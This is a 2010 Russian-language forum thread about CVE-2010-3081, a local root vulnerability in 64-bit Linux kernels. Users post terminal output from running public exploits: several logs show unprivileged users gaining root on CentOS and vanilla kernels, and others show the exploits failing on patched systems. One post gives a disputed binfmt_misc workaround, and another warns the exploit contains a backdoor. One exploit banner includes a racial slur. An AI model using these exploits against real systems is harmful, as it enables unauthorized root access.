86. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +/
Сообщение от Humanoid on 17-Сен-10, 10:16 
на серверах, где хоть каким пользователям доступ имеется всё крутиться внутри openvz контейнеров, на хост систему доступ только у админа, так что опять мимо ....
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

88. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +1 +/
Сообщение от Аноним (??) on 17-Сен-10, 11:15 
>на серверах, где хоть каким пользователям доступ имеется всё крутиться внутри openvz
>контейнеров, на хост систему доступ только у админа, так что опять
>мимо ....

Ты про точки слышал? А если бы по ссылкам ходил, то узнал бы, что есть payload для openvz. А то, что у тебя не сработало, так это потому что ты скорее всего ядро 32 от 64 отличить не можешь. Какое у тебя толком не понятно.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

89. "не тот эксплойт"  +/
Сообщение от Вова on 17-Сен-10, 12:13 
У меня тоже эксплойт от эйсид битч не сработал, но роберт_ю_сак - дал рута.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

93. "same shit ;/"  +/
Сообщение от kepasa on 17-Сен-10, 14:02 
2.6.32.12-115.fc12.x86_64
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

94. "п·п╠п╫п╟я─я┐п╤п╣п╫п╟ п╩п╬п╨п╟п╩я▄п╫п╟я▐ root-я┐я▐п╥п╡п╦п╪п╬я..."  +/
Сообщение от gg email(??) on 17-Сен-10, 14:07 
2.6.18-194.3.1.el5 #1 SMP Thu May 13 13:08:30 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
[hacky@ks310439 ~]$ id
uid=518(hacky) gid=518(hacky) groups=518(hacky)
[hacky@ks310439 ~]$ ./a.out
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-194.3.1.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff80327ac0
$$$ dummy_security_ops->ffffffff804b9540
$$$ capability_ops->ffffffff80329380
$$$ selinux_enforcing->ffffffff804bc2a0
$$$ audit_enabled->ffffffff804a7124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP
sh-3.2# id
uid=0(root) gid=518(hacky) groups=518(hacky)

Centos 5.5

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

95. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от Temper on 17-Сен-10, 16:19 
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-3081

A workaround for this issue is to run this command

  echo ':32bits:M:0:\x7fELF\x01::/bin/echo:' >
/proc/sys/fs/binfmt_misc/register

It disable 32-bit ELF support.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

96. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от аноним on 17-Сен-10, 18:32 
Это никаким местом не workaround. int80 можно вызвать и из 64-битного кода. И 64хбитный robert_you_suck это как бы подтверждает.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

97. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от bircoph on 18-Сен-10, 07:47 
Что-то не понимаю, почему тянут с обновлением мейнстримного ядра?
Я уже давно наложил патчи на 2.6.35.4 и эксплойт больше не работает.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

98. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от Аноним (??) on 18-Сен-10, 13:35 
печально
вчера качал с www.kernel.org 2.4.35.4

~ $ uname -r
2.6.35.4
~ $ id -u
1001
~ $ ./1
resolved symbol commit_creds to 0xffffffff81080e10
resolved symbol prepare_kernel_cred to 0xffffffff810812e0
mapping at 3f80000000
UID 0, EUID:0 GID:0, EGID:0
# id -u
0
#

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

99. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от Аноним email(??) on 18-Сен-10, 15:19 
seleen:~> uname -a
Linux seleen 2.6.26 #1 SMP PREEMPT Mon May 4 23:54:48 MSD 2009 x86_64 GNU/Linux
seleen:~> ./rober          
symbol table not available, aborting!
Process finished
seleen:~> cat /etc/shadow
cat: /etc/shadow: Permission denied
seleen:~>

Как починить?

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

100. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +1 +/
Сообщение от Аноним (??) on 18-Сен-10, 17:44 
ну вот ванильное починили

$ uname -srvm
Linux 2.6.36-rc4-git4 #1 SMP Sat Sep 18 17:49:22 YEKST 2010 x86_64
$ id -u
1001
$ ./1
resolved symbol commit_creds to 0xffffffff81085780
resolved symbol prepare_kernel_cred to 0xffffffff81085c50
mapping at 3f80000000
UID 1001, EUID:1001 GID:1001, EGID:1001
$ id -u
1001
$


Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

101. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от Аноним (??) on 19-Сен-10, 04:26 
Вот млин - а я как назло установил всё на 64-бита и XFS :(
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

102. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от ImPressed (ok) on 20-Сен-10, 01:43 
Гента с последними апдейтами ведра не подвержена уязвимости. Затестил только что.


impressed@satan ~ $ uname -a
Linux satan.net 2.6.35-gentoo-r7-Core2Quad #1 SMP PREEMPT Mon Sep 20 01:48:53 ALMT 2010 x86_64 Intel(R) Core(TM)2 Quad CPU Q6600 @ 2.40GHz GenuineIntel GNU/Linux
impressed@satan ~ $ cd Compiler/
impressed@satan ~/Compiler $ ./sploit
resolved symbol commit_creds to 0xffffffff81059460
resolved symbol prepare_kernel_cred to 0xffffffff81059a20
mapping at 3f80000000
UID 1488, EUID:1488 GID:1488, EGID:1488
sh-4.0$

Сплойт лососает тунца, как видно.

Второй тоже не пашет =)

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

104. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от CHERTS (??) on 21-Сен-10, 06:07 
Помимо того что это эксплоит, это еще и бэкдор... Вобщем читаем
https://www.opennet.ru/opennews/art.shtml?num=28017
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру